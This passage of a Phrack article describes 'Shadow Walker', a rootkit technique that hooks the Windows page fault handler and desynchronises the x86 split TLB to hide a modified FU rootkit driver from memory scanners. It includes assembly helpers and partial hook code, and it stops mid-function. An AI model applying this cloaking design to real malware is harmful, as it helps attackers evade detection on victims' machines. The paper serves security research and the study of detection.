Raising The Bar For Windows Rootkit Detection

Osiris · Feb 3, 2006

==Phrack Inc.==

Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x14

|=-------------------------=[ Shadow Walker ]=---------------------------=|
|=--------=[ Raising The Bar For Windows Rootkit Detection ]=------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ Sherri Sparks <ssparks at mail.cs.ucf dot edu > ]=---------=|
|=---------=[ Jamie Butler <james.butler at hbgary dot com > ]=---------=|

0 - Introduction & Background On Rootkit Technology
0.1 - Motivations

1 - Rootkit Detection
1.1 - Detecting The Effect Of A Rootkit (Heuristics)
1.2 - Detecting The Rootkit Itself (Signatures)

2 - Memory Architecture Review
2.1 - Virtual Memory - Paging vs. Segmentation
2.2 - Page Tables & PTE's
2.3 - Virtual to Physical Address Translation
2.4 - The Role of the Page Fault Handler
2.5 - The Paging Performance Problem & the TLB

3 - Memory Cloaking Concept
3.1 - Hiding Executable Code
3.2 - Hiding Pure Data
3.3 - Related Work
3.4 - Proof of Concept Implementation
3.4.a - Modified FU Rootkit
3.4.b - Shadow Walker Memory Hook Engine

4 - Known Limitations & Performance Impact

5 - Detection

6 - Conclusion

7 - References

8 - Acknowlegements

--[ 0 - Introduction & Background

Rootkits have historically demonstrated a co-evolutionary adaptation and
response to the development of defensive technologies designed to
apprehend their subversive agenda. If we trace the evolution of rootkit
technology, this pattern is evident. First generation rootkits were
primitive. They simply replaced / modified key system files on the
victim's system. The UNIX login program was a common target and involved
an attacker replacing the original binary with a maliciously enhanced
version that logged user passwords. Because these early rootkit
modifications were limited to system files on disk, they motivated the
development of file system integrity checkers such as Tripwire [1].

In response, rootkit developers moved their modifications off disk to the
memory images of the loaded programs and, again, evaded detection. These
'second' generation rootkits were primarily based upon hooking techniques
that altered the execution path by making memory patches to loaded
applications and some operating system components such as the system call
table. Although much stealthier, such modifications remained detectable by
searching for heuristic abnormalities. For example, it is suspicious for
the system service table to contain pointers that do not point to the
operating system kernel. This is the technique used by VICE [2].

Third generation kernel rootkit techniques like Direct Kernel Object
Manipulation (DKOM), which was implemented in the FU rootkit [3],
capitalize on the weaknesses of current detection software by modifying
dynamically changing kernel data structures for which it is impossible to
establish a static trusted baseline.

----[ 0.1 - Motivations

There are public rootkits which illustrate all of these various techniques,
but even the most sophisticated Windows kernel rootkits, like FU, possess
an inherent flaw. They subvert essentially all of the operating system's
subsystems with one exception: memory management. Kernel rootkits can
control the execution path of kernel code, alter kernel data, and fake
system call return values, but they have not (yet) demonstrated the
capability to 'hook' or fake the contents of memory seen by other running
applications. In other words, public kernel rootkits are sitting ducks for
in memory signature scans. Only now are security companies beginning to
think of implementing memory signature scans.

Hiding from memory scans is similar to the problem faced by early viruses
attempting to hide on the file system. Virus writers reacted to anti-virus
programs scanning the file system by developing polymorphic and metamorphic
techniques to evade detection. Polymorphism attempts to alter the binary
image of a virus by replacing blocks of code with functionally equivalent
blocks that appear different (i.e. use different opcodes to perform the
same task). Polymorphic code, therefore, alters the superficial appearance
of a block of code, but it does not fundamentally alter a scanner's view of
that region of system memory.

Traditionally, there have been three general approaches to malicious code
detection: misuse detection, which relies upon known code signatures,
anomaly detection, which relies upon heuristics and statistical deviations
from 'normal' behavior, and integrity checking which relies upon comparing
current snapshots of the file system or memory with a known, trusted
baseline. A polymorphic rootkit (or virus) effectively evades signature
based detection of its code body, but falls short in anomaly or integrity
detection schemes because it cannot easily camouflage the changes it makes
to existing binary code in other system components.

Now imagine a rootkit that makes no effort to change its superficial
appearance, yet is capable of fundamentally altering a detectors view of an
arbitrary region of memory. When the detector attempts to read any region
of memory modified by the rootkit, it sees a 'normal', unaltered view of
memory. Only the rootkit sees the true, altered view of memory. Such a
rootkit is clearly capable of compromising all of the primary detection
methodologies to varying degrees. The implications to misuse detection are
obvious. A scanner attempts to read the memory for the loaded rootkit
driver looking for a code signature and the rootkit simply returns a
random, 'fake' view of memory (i.e. which does not include its own code) to
the scanner. There are also implications for integrity validation
approaches to detection. In these cases, the rootkit returns the unaltered
view of memory to all processes other than itself. The integrity checker
sees the unaltered code, finds a matching CRC or hash, and (erroneously)
assumes that all is well. Finally, any anomaly detection methods which
rely upon identifying deviant structural characteristics will be fooled
since they will receive a 'normal' view of the code. An example of this
might be a scanner like VICE which attempts to heuristically identify
inline function hooks by the presence of a direct jump at the beginning of
the function body.

Current rootkits, with the exception of Hacker Defender [4], have made
little or no effort to introduce viral polymorphism techniques. As stated
previously, while a valuable technique, polymorphism is not a comprehensive
solution to the problem for a rootkit because the rootkit cannot easily
camouflage the changes it must make to existing code in order to install
its hooks. Our objective, therefore, is to show proof of concept that the
current architecture permits subversion of memory management such that a
non polymorphic kernel mode rootkit (or virus) is capable of controlling
the view of memory regions seen by the operating system and other processes
with a minimal performance hit. The end result is that it is possible to
hide a 'known' public rootkit driver (for which a code signature exists)
from detection. To this end, we have designed an 'enhanced' version of the
FU rootkit. In section 1, we discuss the basic techniques used to detect a
rootkit. In section 2, we give a background summary of the x86 memory
architecture. Section 3 outlines the concept of memory cloaking and proof
of concept implementation for our enhanced rootkit. Finally, we
conclude with a discussion of its detectability, limitations, future
extensibility, and performance impact. Without further ado, we bid you
welcome to 4th generation rootkit technology.

--[ 1 - Rootkit Detection

Until several months ago, rootkit detection was largely ignored by security
vendors. Many mistakenly classified rootkits in the same category as other
viruses and malware. Because of this, security companies continued to use
the same detection methods the most prominent one being signature scans on
the file system. This is only partially effective. Once a rootkit is loaded
in memory is can delete itself on disk, hide its files, or even divert an
attempt to open the rootkit file. In this section, we will examine more
recent advances in rootkit detection.

----[ 1.2 - Detecting The Effect Of A Rootkit (Heuristics)

One method to detect the presence of a rootkit is to detect how it alters
other parameters on the computer system. In this way, the effects of the
rootkit are seen although the actual rootkit that caused the deviation may
not be known. This solution is a more general approach since no signature
for a particular rootkit is necessary. This technique is also looking for
the rootkit in memory and not on the file system.

One effect of a rootkit is that it usually alters the execution path of a
normal program. By inserting itself in the middle of a program's execution,
the rootkit can act as a middle man between the kernel functions the
program relies upon and the program. With this position of power, the
rootkit can alter what the program sees and does. For example, the rootkit
could return a handle to a log file that is different from the one the
program intended to open, or the rootkit could change the destination of
network communication. These rootkit patches or hooks cause extra
instructions to be executed. When a patched function is compared to a
normal function, the difference in the number of instructions executed can
be indicative of a rootkit. This is the technique used by PatchFinder [5].
One of the drawbacks of PatchFinder is that the CPU must be put into single
step mode in order to count instructions. So for every instruction executed
an interrupt is fired and must be handled. This slows the performance of
the system, which may be unacceptable on a production machine. Also, the
actual number of instructions executed can vary even on a clean system.
Another rootkit detection tool called VICE detects the presence of hooks in
applications and in the kernel . VICE analyzes the addresses of the
functions exported by the operating system looking for hooks. The exported
functions are typically the target of rootkits because by filtering certain
APIs rootkits can hide. By finding the hooks themselves, VICE avoids the
problems associated with instruction counting. However, VICE also relies
upon several APIs so it is possible for a rootkit to defeat its hook
detection [6]. Currently the biggest weakness of VICE is that it detects
all hooks both malicious and benign. Hooking is a legitimate technique used
by many security products.

Another approach to detecting the effects of a rootkit is to identify the
operating system lying. The operating system exposes a well-known API in
order for applications to interact with it. When the rootkit alters the
results of a particular API, it is a lie. For example, Windows Explorer may
request the number of files in a directory using several functions in the
Win32 API. If the rootkit changes the number of files that the application
can see, it is a lie. To detect the lie, a rootkit detector needs at least
two ways to obtain the same information. Then, both results can be
compared. RootkitRevealer [7] uses this technique. It calls the highest
level APIs and compares those results with the results of the lowest level
APIs. This method can be bypassed by a rootkit if it also hooks at those
lowest layers. RootkitRevealer also does not address data alterations. The
FU rootkit alters the kernel data structures in order to hide its
processes. RootkitRevealer does not detect this because both the higher and
lower layer APIs return the same altered data set. Blacklight from F-Secure
[8] also tries to detect deviations from the truth. To detect hidden
processes, it relies on an undocumented kernel structure. Just as FU walks
the linked list of processes to hide, Blacklight walks a linked list of
handle tables in the kernel. Every process has a handle table; therefore,
by identifying all the handle tables Blacklight can find a pointer to every
process on the computer. FU has been updated to also unhook the hidden
process from the linked list of handle tables. This arms race will
continue.

----[ 1.2 - Detecting the Rootkit Itself (Signatures)

Anti-virus companies have shown that scanning file systems for signatures
can be effective; however, it can be subverted. If the attacker camouflages
the binary by using a packing routine, the signature may no longer match
the rootkit. A signature of the rootkit as it will execute in memory is one
way to solve this problem. Some host based intrusion prevention systems
(HIPS) try to prevent the rootkit from loading. However, it is extremely
difficult to block all the ways code can be loaded in the kernel . Recent
papers by Jack Barnaby [9] and Chong [10] have highlighted the threat of
kernel exploits, which will allow arbitrary code to be loaded into memory
and executed.

Although file system scans and loading detection are needed, perhaps the
last layer of detection is scanning memory itself. This provides an added
layer of security if the rootkit has bypassed the previous checks. Memory
signatures are more reliable because the rootkit must unpack or unencrypt
in order to execute. Not only can scanning memory be used to find a
rootkit, it can be used to verify the integrity of the kernel itself since
it has a known signature. Scanning kernel memory is also much faster than
scanning everything on disk. Arbaugh et. al. [11] have taken this technique
to the next level by implementing the scanner on a separate card with its
own CPU.

The next section will explain the memory architecture on Intel x86.

--[ 2 - Memory Architecture Review

In early computing history, programmers were constrained by the amount of
physical memory contained in a system. If a program was too large to fit
into memory, it was the programmer's responsibility to divide the program
into pieces that could be loaded and unloaded on demand. These pieces were
called overlays. Forcing this type of memory management upon user level
programmers increased code complexity and programming errors while reducing
efficiency. Virtual memory was invented to relieve programmers of these
burdens.

----[ 2.1 - Virtual Memory - Paging vs. Segmentation

Virtual memory is based upon the separation of the virtual and physical
address spaces. The size of the virtual address space is primarily a
function of the width of the address bus whereas the size of the physical
address space is dependent upon the quantity of RAM installed in the
system. Thus, a system possessing a 32 bit bus is capable of addressing
2^32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not
have anywhere near that quantity of RAM installed. If this is the case,
then the virtual address space will be larger than the physical address
space. Virtual memory divides both the virtual and physical address spaces
into fixed size blocks. If these blocks are all the same size, the system
is said to use a paging memory model. If the blocks are varying sizes, it
is considered to be a segmentation model. The x86 architecture is in fact a
hybrid, utlizing both segementation and paging, however, this article
focuses primarily upon exploitation of its paging mechanism.

Under a paging model, blocks of virtual memory are referred to as pages and
blocks of physical memory are referred to as frames. Each virtual page maps
to a designated physical frame. This is what enables the virtual address
space seen by programs to be larger than the amount of physically
addressable memory (i.e. there may be more pages than physical frames). It
also means that virtually contiguous pages do not have to be physically
contiguous. These points are illustrated by Figure 1.

VIRTUAL ADDRESS PHYSICAL ADDRESS
SPACE SPACE
/-------------\ /-------------\
| | | |
| PAGE 01 |---\ /----------->>>| FRAME 01 |
| | | | | |
--------------- | | ---------------
| | | | | |
| PAGE 02 |------------------->>>| FRAME 02 |
| | | | | |
--------------- | | ---------------
| | | | | |
| PAGE 03 | \---|----------->>>| FRAME 03 |
| | | | |
--------------- | \-------------/
| | |
| PAGE 04 | |
| | |
|-------------| |
| | |
| PAGE 05 |-------/
| |
\-------------/

[ Figure 1 - Virtual To Physical Memory Mapping (Paging) ]
[ ]
[ NOTE: 1. Virtual & physical address spaces are divided into ]
[ fixed size blocks. 2. The virtual address space may be larger ]
[ than the physical address space. 3. Virtually contiguous ]
[ blocks to not have to be mapped to physically contiguous ]
[ frames. ]

----[ 2.2 - Page Tables & PTE's

The mapping information that connects a virtual address with its physical
frame is stored in page tables in structures known as PTE's. PTE's also
store status information. Status bits may indicate, for example, weather or
not a page is valid (physically present in memory versus stored on disk),
if it is writable, or if it is a user / supervisor page. Figure 2 shows the
format for an x86 PTE.

Valid <------------------------------------------------\
Read/Write <--------------------------------------------\ |
Privilege <----------------------------------------\ | |
Write Through <------------------------------------\ | | |
Cache Disabled <--------------------------------\ | | | |
Accessed <---------------------------\ | | | | |
Dirty <-----------------------\ | | | | | |
Reserved <-------------------\ | | | | | | |
Global <---------------\ | | | | | | | |
Reserved <----------\ | | | | | | | | |
Reserved <-----\ | | | | | | | | | |
Reserved <-\ | | | | | | | | | | |
| | | | | | | | | | | |
+----------------+---+----+----+---+---+---+----+---+---+---+---+-+
| | | | | | | | | | | U | R | |
| PAGE FRAME # | U | P | Cw | Gl | L | D | A | Cd | Wt| / | / | V |
| | | | | | | | | | | S | W | |
+-----------------------------------------------------------------+

[ Figure 2 - x86 PTE FORMAT (4 KBYTE PAGE) ]

----[ 2.4 - Virtual To Physical Address Translation

Virtual addresses encode the information necessary to find their PTE's in
the page table. They are divided into 2 basic parts: the virtual page
number and the byte index. The virtual page number provides the index into
the page table while the byte index provides an offset into the physical
frame. When a memory reference occurs, the PTE for the page is looked up in
the page table by adding the page table base address to the virtual page
number * PTE entry size. The base address of the page in physical memory is
then extracted from the PTE and combined with the byte offset to define the
physical memory address that is sent to the memory unit. If the virtual
address space is particularly large and the page size relatively small, it
stands to reason that it will require a large page table to hold all of the
mapping information. And as the page table must remain resident in main
memory, a large table can be costly. One solution to this dilemma is to use
a multi-level paging scheme. A two-level paging scheme, in effect, pages
the page table. It further subdivides the virtual page number into a page
directory and a page table index. The page directory is simply a table of
pointers to page tables. This two level paging scheme is the one supported
by the x86. Figure 3 illustrates how the virtual address is divided up to
index the page directory and page tables and Figure 4 illustrates the
process of address translation.

+---------------------------------------+
| 31 12 | 0
| +----------------+ +----------------+ | +---------------+
| | PAGE DIRECTORY | | PAGE TABLE | | | BYTE INDEX |
| | INDEX | | INDEX | | | |
| +----------------+ +----------------+ | +---------------+
| 10 bits 10 bits | 12 bits
| |
| VIRTUAL PAGE NUMBER |
+---------------------------------------+

[ Figure 3 - x86 Address & Page Table Indexing Scheme ]

+--------+
/-|KPROCESS|
| +--------+
| Virtual Address
| +------------------------------------------+
| | Page Directory | Page Table | Byte Index |
| | Index | Index | |
| +-+-------------------+-------------+------+
| | +---+ | |
| | |CR3| Physical | |
| | +---+ Address Of | |
| | Page Dir | |
| | | \------ -\
| | | |
| | Page Directory | Page Table | Physical Memory
\---|->+------------+ | /-->+------------+ \---->+------------+
| | | | | | | | |
| | | | | | | | |
| | | | | | | |------------|
| | | | | | | | |
| |------------| | | | | | Page |
\->| PDN |---|-/ | | | Frame |
|------------| | | | /----> |
| | | | | | |------------|
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | |------------| | | |
| | \---->| PFN -------/ | |
| | |------------| | |
+------------+ +------------+ +------------+
(1 per process) (512 per processs)

[ Figure 4 - x86 Address Translation ]

A memory access under a 2 level paging scheme potentially involves the
following sequence of steps.

1. Lookup of page directory entry (PDE).
Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page
Directory Index (extracted from virtual address that caused the memory
access)
NOTE: Windows maps the page directory to virtual address 0xC0300000.
Base addresses for page directories are also located in KPROCESS blocks
and the register cr3 contains the physical address of the current
page directory.

2. Lookup of page table entry.
Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table
Index (extracted from virtual address that caused the memory access).
NOTE: Windows maps the page directory to virtual address 0xC0000000.
The base physical address for the page table is also stored in the page
directory entry.

3. Lookup of physical address.
Physical Address = Contents of PTE + Byte Index
NOTE: PTEs hold the physical address for the physical frame. This is
combined with the byte index (offset into the frame) to form the
complete physical address. For those who prefer code to explanation, the
following two routines show how this translation occurs. The first
routine, GetPteAddress performs steps 1 and 2 described above. It
returns a pointer to the page table entry for a given virtual address.
The second routine returns the base physical address of the frame to
which the page is mapped.

#define PROCESS_PAGE_DIR_BASE 0xC0300000
#define PROCESS_PAGE_TABLE_BASE 0xC0000000
typedef unsigned long* PPTE;

/**************************************************************************
* GetPteAddress - Returns a pointer to the page table entry corresponding
* to a given memory address.
*
* Parameters:
* PVOID VirtualAddress - Address you wish to acquire a pointer to the
* page table entry for.
*
* Return - Pointer to the page table entry for VirtualAddress or an error
* code.
*
* Error Codes:
* ERROR_PTE_NOT_PRESENT - The page table for the given virtual
* address is not present in memory.
* ERROR_PAGE_NOT_PRESENT - The page containing the data for the
* given virtual address is not present in
* memory.
**************************************************************************/
PPTE GetPteAddress( PVOID VirtualAddress )
{
PPTE pPTE = 0;
__asm
{
cli //disable interrupts
pushad
mov esi, PROCESS_PAGE_DIR_BASE
mov edx, VirtualAddress
mov eax, edx
shr eax, 22
lea eax, [esi + eax*4] //pointer to page directory entry
test [eax], 0x80 //is it a large page?
jnz Is_Large_Page //it's a large page
mov esi, PROCESS_PAGE_TABLE_BASE
shr edx, 12
lea eax, [esi + edx*4] //pointer to page table entry (PTE)
mov pPTE, eax
jmp Done

//NOTE: There is not a page table for large pages because
//the phys frames are contained in the page directory.
Is_Large_Page:
mov pPTE, eax

Done:
popad
sti //reenable interrupts
}//end asm

return pPTE;

}//end GetPteAddress

/**************************************************************************
* GetPhysicalFrameAddress - Gets the base physical address in memory where
* the page is mapped. This corresponds to the
* bits 12 - 32 in the page table entry.
*
* Parameters -
* PPTE pPte - Pointer to the PTE that you wish to retrieve the
* physical address from.
*
* Return - The physical address of the page.
**************************************************************************/
ULONG GetPhysicalFrameAddress( PPTE pPte )
{
ULONG Frame = 0;

__asm
{
cli
pushad
mov eax, pPte
mov ecx, [eax]
shr ecx, 12 //physical page frame consists of the
//upper 20 bits
mov Frame, ecx
popad
sti
}//end asm
return Frame;

}//end GetPhysicalFrameAddress

----[ 2.5 - The Role Of The Page Fault Handler

Since many processes only use a small portion of their virtual address
space, only the used portions are mapped to physical frames. Also, because
physical memory may be smaller than the virtual address space, the OS may
move less recently used pages to disk (the pagefile) to satisfy current
memory demands. Frame allocation is handled by the operating system. If a
process is larger than the available quantity of physical memory, or the
operating system runs out of free physical frames, some of the currently
allocated frames must be swapped to disk to make room. These swapped out
pages are stored in the page file. The information about whether or not a
page is resident in main memory is stored in the page table entry. When a
memory access occurs, if the page is not present in main memory a page
fault is generated. It is the job of the page fault handler to issue the
I/O requests to swap out a less recently used page if all of the available
physical frames are full and then to bring in the requested page from the
pagefile. When virtual memory is enabled, every memory access must be
looked up in the page table to determine which physical frame it maps to
and whether or not it is present in main memory. This incurs a substantial
performance overhead, especially when the architecture is based upon a
multi-level page table scheme like the Intel Pentium. The memory access
page fault path can be summarized as follows.

1. Lookup in the page directory to determine if the page table for the
address is present in main memory.
2. If not, an I/O request is issued to bring in the page table from disk.
3. Lookup in the page table to determine if the requested page is present
in main memory.
4. If not, an I/O request is issued to bring in the page from disk.
5. Lookup the requested byte (offset) in the page.

Therefore every memory access, in the best case, actually requires 3 memory
accesses : 1 to access the page directory, 1 to access the page table, and
1 to get the data at the correct offset. In the worst case, it may require
an additional 2 disk I/Os (if the pages are swapped out to disk). Thus,
virtual memory incurs a steep performance hit.

----[ 2.6 - The Paging Performance Problem & The TLB

The translation lookaside buffer (TLB) was introduced to help mitigate this
problem. Basically, the TLB is a hardware cache which holds frequently used
virtual to physical mappings. Because the TLB is implemented using
extremely fast associative memory, it can be searched for a translation
much faster than it would take to look that translation up in the page
tables. On a memory access, the TLB is first searched for a valid
translation. If the translation is found, it is termed a TLB hit.
Otherwise, it is a miss. A TLB hit, therefore, bypasses the slower page
table lookup. Modern TLB's have an extremely high hit rate and
therefore seldom incur miss penalty of looking up the translation in the
page table.

--[ 3 - Memory Cloaking Concept

One goal of an advanced rootkit is to hide its changes to executable code
(i.e. the placement of an inline patch, for example). Obviously, it may
also wish to hide its own code from view. Code, like data, sits in memory
and we may define the basic forms of memory access as:

- EXECUTE
- READ
- WRITE

Technically speaking, we know that each virtual page maps to a physical
page frame defined by a certain number of bits in the page table entry.
What if we could filter memory accesses such that EXECUTE accesses mapped
to a different physical frame than READ / WRITE accesses? From a rootkit's
perspective, this would be highly advantageous. Consider the case of an
inline hook. The modified code would run normally, but any attempts to read
(i.e. detect) changes to the code would be diverted to a 'virgin' physical
frame that contained a view of the original, unaltered code. Similarly, a
rootkit driver might hide itself by diverting READ accesses within its
memory range off to a page containing random garbage or to a page
containing a view of code from another 'innocent' driver. This would imply
that it is possible to spoof both signature scanners and integrity
monitors. Indeed, an architectural feature of the Pentium architecture
makes it possible for a rootkit to perform this little trick with a minimal
impact on overall system performance. We describe the details in the next
section.

----[ 3.1 - Hiding Executable Code

Ironically, the general methodology we are about to discuss is an
offensive extension of an existing stack overflow protection scheme known
as PaX. We briefly discuss the PaX implementation in 3.3 under related
work.

In order to hide executable code, there are at least 3 underlying issues
which must be addressed:

1. We need a way to filter execute and read / write accesses.
2. We need a way to "fake" the read / write memory accesses
when we detect them.
3. We need to ensure that performance is not adversly affected.

The first issue concerns how to filter execute accesses from read / write
accesses. When virtual memory is enabled, memory access restrictions are
enforced by setting bits in the page table entry which specify whether a
given page is read-only or read-write. Under the IA-32 architecture,
however, all pages are executable. As such, there is no official way to
filter execute accesses from read / write accesses and thus enforce the
execute-only / diverted read-write semantics necessary for this scheme
to work. We can, however, trap and filter memory accesses by marking their
PTE's non present and hooking the page fault handler. In the page fault
handler we have access to the saved instruction pointer and the faulting
address. If the instruction pointer equals the faulting address, then it is
an execute access. Otherwise, it is a read / write. As the OS uses the
present bit in memory management, we also need to differentiate between
page faults due to our memory hook and normal page faults. The simplest
way is to require that all hooked pages either reside in non paged memory
or be explicitly locked down via an API like MmProbeAndLockPages.

The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses
when we detect them (and do so with a minimal performance hit). In this
case, the Pentium TLB architecture comes to the rescue. The pentium
possesses a split TLB with one TLB for instructions and the other for data.
As mentioned previously, the TLB caches the virtual to physical page frame
mappings when virtual memory is enabled. Normally, the ITLB and DTLB are
synchronized and hold the same physical mapping for a given page. Though
the TLB is primarily hardware controlled, there are several software
mechanisms for manipulating it.

- Reloading cr3 causes all TLB entries except global entries to be
flushed. This typically occurs on a context switch.
- The invlpg causes a specific TLB entry to be flushed.
- Executing a data access instruction causes the DTLB to be loaded with
the mapping for the data page that was accessed.
- Executing a call causes the ITLB to be loaded with the mapping for the
page containing the code executed in response to the call.

We can filter execute accesses from read / write accesses and fake them by
desynchronizing the TLB's such that the ITLB holds a different virtual to
physical mapping than the DTLB. This process is performed as follows:

First, a new page fault handler is installed to handle the cloaked page
accesses. Then the page-to-be-hooked is marked not present and it's
TLB entry is flushed via the invlpg instruction. This ensures that all
subsequent accesses to the page will be filtered through the installed
page fault handler. Within the installed page fault handler, we determine
whether a given memory access is due to an execute or read/write by
comparing the saved instruction pointer with the faulting address. If they
match, the memory access is due to an execute. Otherwise, it is due to a
read / write. The type of access determines which mapping is manually
loaded into the ITLB or DTLB. Figure 5 provides a conceptual view
of this strategy.

Lastly, it is important to note that TLB access is much faster than
performing a page table lookup. In general, page faults are costly.
Therefore, at first glance, it might appear that marking the hidden pages
not present would incur a significant performance hit. This is, in fact,
not the case. Though we mark the hidden pages not present, for most memory
accesses we do not incur the penalty of a page fault because the entries
are cached in the TLB. The exceptions are, of course, the initial faults
that occur after marking the cloaked page not present and any subsequent
faults which result from cache line evictions when a TLB set becomes full.
Thus, the primary job of the new page fault handler is to explicitly and
selectively load the DTLB or ITLB with the correct mappings for hidden
pages. All faults originating on other pages are passed down to the
operating system page fault handler.

+-------------+
rootkit code | FRAME 1 |
Is it a +-----------+ /------------->| |
code | | | |-------------|
access? | ITLB | | | FRAME 2 |
/------>|-----------|-----------/ | |
| | VPN=12 | |-------------|
| | Frame=1 | | FRAME 3 |
| +-----------+ | |
| +-------------+ |-------------|
MEMORY | PAGE TABLES | | FRAME 4 |
ACCESS +-------------+ | |
VPN=12 |-------------|
| | FRAME 5 |
| +-----------+ | |
| | | |-------------|
| | DTLB | random garbage | FRAME 6 |
|------>|------------------------------------->| |
Is it a | VPN=12 | |-------------|
data | Frame=6 | | FRAME N |
access? +-----------+ | |
+-------------+

[ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ]

----[ 3.2 - Hiding Pure Data

Hiding data modifications is significantly less optimal than hiding code
modifications, but it can be accomplished provided that one is willing to
accept the performance hit. We cause a minimal performance loss when
hiding executable code by virtue of the fact that the ITLB can maintain a
different mapping than the DTLB. Code can execute very fast with a minimum
of page faults because that mapping is always present in the ITLB (except
in the rare event the ITLB entry gets evicted from the cache).
Unfortunately, in the case of data we can't introduce any such
inconsistency. There is only 1 DTLB and consequently that DTLB has to be
kept empty if we are to catch and filter specific data accesses. The end
result is 1 page fault per data access. This is not be a big problem in
terms of hiding a specific driver if the driver is carefully designed and
uses a minimum of global data, but the performance hit could be formidable
when trying to hide a frequently accessed data page.

For data hiding, we have used a protocol based approach between the hidden
driver and the memory hook. We use this to show how one might hide global
data in a rootkit driver. In order to allow the memory access to go throug
the DTLB is loaded in the page fault handler. In order to enforce the
correct filtering of data accesses, however, it must be flushed immediately
by the requesting driver to ensure that no other code accesses that memory
address and receives the data resulting from an incorrect mapping.
The protocol for accessing data on a hidden page is as follows:

1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other
code gets to run which might see the "hidden" data as opposed to the
"fake" data).

2. The driver must explicitly flush the TLB entry for the page containing
the cloaked variable using the invlpg instruction. In the event that
some other process has attempted to access our data page and been
served with the fake frame (i.e. we don't want to receive the fake
mapping which may still reside in the TLB so we clear it to be sure).

3. The driver is allowed to perform the data access.

4. The driver must explicitly flush the TLB entry for the page containing
the cloaked variable using the invlpg instruction (i.e. so that the
"real" mapping does not remain in the TLB. We don't want any other
drivers or processes receiving the hidden mapping so we clear it).

5. The driver lowers the IRQL to the previous level before it was raised.

The additional restriction also applies:

- No global data can be passed to kernel API functions. When calling an
API, global data must be copied into local storage on the stack and
passed into the API function (i.e. if the API accesses the cloaked
variable it will receive fake data and perform incorrectly).

This protocol can be efficiently implemented in the hidden driver by having
the driver copy all global data over into local variables at the beginning
of the routine and then copy the data back after the function body has
completed executing. Because stack data is in a constant state of flux, it
is unlikely that a signature could be reliably obtained from global data
on the stack. In this way, there is no need to cause a page fault on every
global access. In general, only one page fault is required to copy over the
data at the beginning of the routine and one fault to copy the data back at
the end of the routine. Admittedly, this disregards more complex issues
involved with multithreaded access and synchronization. An alternative
approach to using a protocol between the driver and PF handler would
be to single step the instruction causing the memory access. This would
be less cumbersome for the driver and yet allow the PF handler to maintain
control of the DTLB (ie. to flush it after the data access so that it
remains empty).

----[ 3.3 - Related Work

Ironically, the memory cloaking technology discussed in this article is
derived from an existing stack overflow protection scheme known as PaX .
As such, we demonstrate a potentially offensive application of an
originally defensive technology. Though very similar (i.e. taking advantage
of the Pentium split TLB architecture), there are subtle differences
between PaX and the rootkit application of the technology. Whereas our
memory cloaked rootkit enforces execute, diverted read / write semantics,
PaX enforces read / write, no execute semantics. This enables PaX to
provide software support for a non executable stack under the IA-32
architecture, thereby thwarting a large class of stack based buffer
overflow attacks. When a PaX protected system detects an attempted execute
in a read / write only range of memory, it terminates the offending
process. Hardware support for non executable memory has subsequently been
added to the page table entry format for some processors including IA-64
and pentium 4. In contrast to PaX, our rootkit handler allows
execution to proceed normally while diverting read / write accesses to
the hidden page off to an innocent appearing shadow page. Finally, it should
be noted that PaX uses the PTE user / supervisor bit to generate the
page faults required to enforce its protection. This limits it to protection
of solely user mode pages which is an impractical limitation for a
kernel mode rootkit. As such, we use the PTE present / not present bit
in our implementation.

----[ 3.4 - Proof Of Concept Implementation

Our current implementation uses a modified FU rootkit and a new page fault
handler called Shadow Walker. Since FU alters kernel data structures to
hide processes and does not utilize any code hooks, we only had to be
concerned with hiding the FU driver in memory. The kernel accounts for
every process running on the system by storing an object called an EPROCESS
block for each process in an internal linked list. FU disconnects the
process it wants to hide from this linked list.

------[ 3.4.a - Modified FU Rootkit

We modified the current version of the FU rootkit taken from rootkit.com.
In order to make it more stealthy, its dependence on a userland
initialization program was removed. Now, all setup information in the form
of OS dependant offsets are derived with a kernel level function. By
removing the userland portion, we eliminated the need to create a symbolic
link to the driver and the need to create a functional device, both of
which are easily detected. Once FU is installed, its image on the file
system can be deleted so all anti-virus scans on the file system will fail
to find it. You can also imagine that FU could be installed from a kernel
exploit and loaded into memory thereby avoiding any image on disk
detection. Also, FU hides all processes whose names are prefixed with
_fu_ regardless of the process ID (PID). We create a System thread that
continually scans this list of processes looking for this prefix. FU and
the memory hook, Shadow Walker, work in collusion; therefore, FU relies on
Shadow Walker to remove the driver from the linked list of drivers in
memory and from the Windows Object Manager's driver directory.

----[ 3.4.b - Shadow Walker Memory Hook Engine

Shadow Walker consists of a memory hook installation module and a new page
fault handler. The memory hook module takes the virtual address of the
page to be hidden as a parameter. It uses the information contained in the
address to perform a few sanity checks. Shadow Walker then installs the new
page fault handler by hooking Int 0E (if it has not been previously
installed) and inserts the information about the hidden page into a hash
table so that it can be looked up quickly on page faults. Lastly, the PTE
for the page is marked non present and the TLB entry for the hidden page
is flushed. This ensures that all subsequent accesses to the page are
filtered by the new page fault handler.

/*************************************************************************
* HookMemoryPage - Hooks a memory page by marking it not present
* and flushing any entries in the TLB. This ensure
* that all subsequent memory accesses will generate
* page faults and be filtered by the page fault handler.
*
* Parameters:
* PVOID pExecutePage - pointer to the page that will be used on
* execute access
*
* PVOID pReadWritePage - pointer to the page that will be used to load
* the DTLB on data access *
*
* PVOID pfnCallIntoHookedPage - A void function which will be called
* from within the page fault handler to
* to load the ITLB on execute accesses
*
* PVOID pDriverStarts (optional) - Sets the start of the valid range
* for data accesses originating from
* within the hidden page.
*
* PVOID pDriverEnds (optional) - Sets the end of the valid range for
* data accesses originating from within
* the hidden page.
* Return - None
**************************************************************************/
void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage,
PVOID pfnCallIntoHookedPage, PVOID pDriverStarts,
PVOID pDriverEnds )
{
HOOKED_LIST_ENTRY HookedPage = {0};
HookedPage.pExecuteView = pExecutePage;
HookedPage.pReadWriteView = pReadWritePage;
HookedPage.pfnCallIntoHookedPage = pfnCallIntoHookedPage;
if( pDriverStarts != NULL)
HookedPage.pDriverStarts = (ULONG)pDriverStarts;
else
HookedPage.pDriverStarts = (ULONG)pExecutePage;

if( pDriverEnds != NULL)
HookedPage.pDriverEnds = (ULONG)pDriverEnds;
else
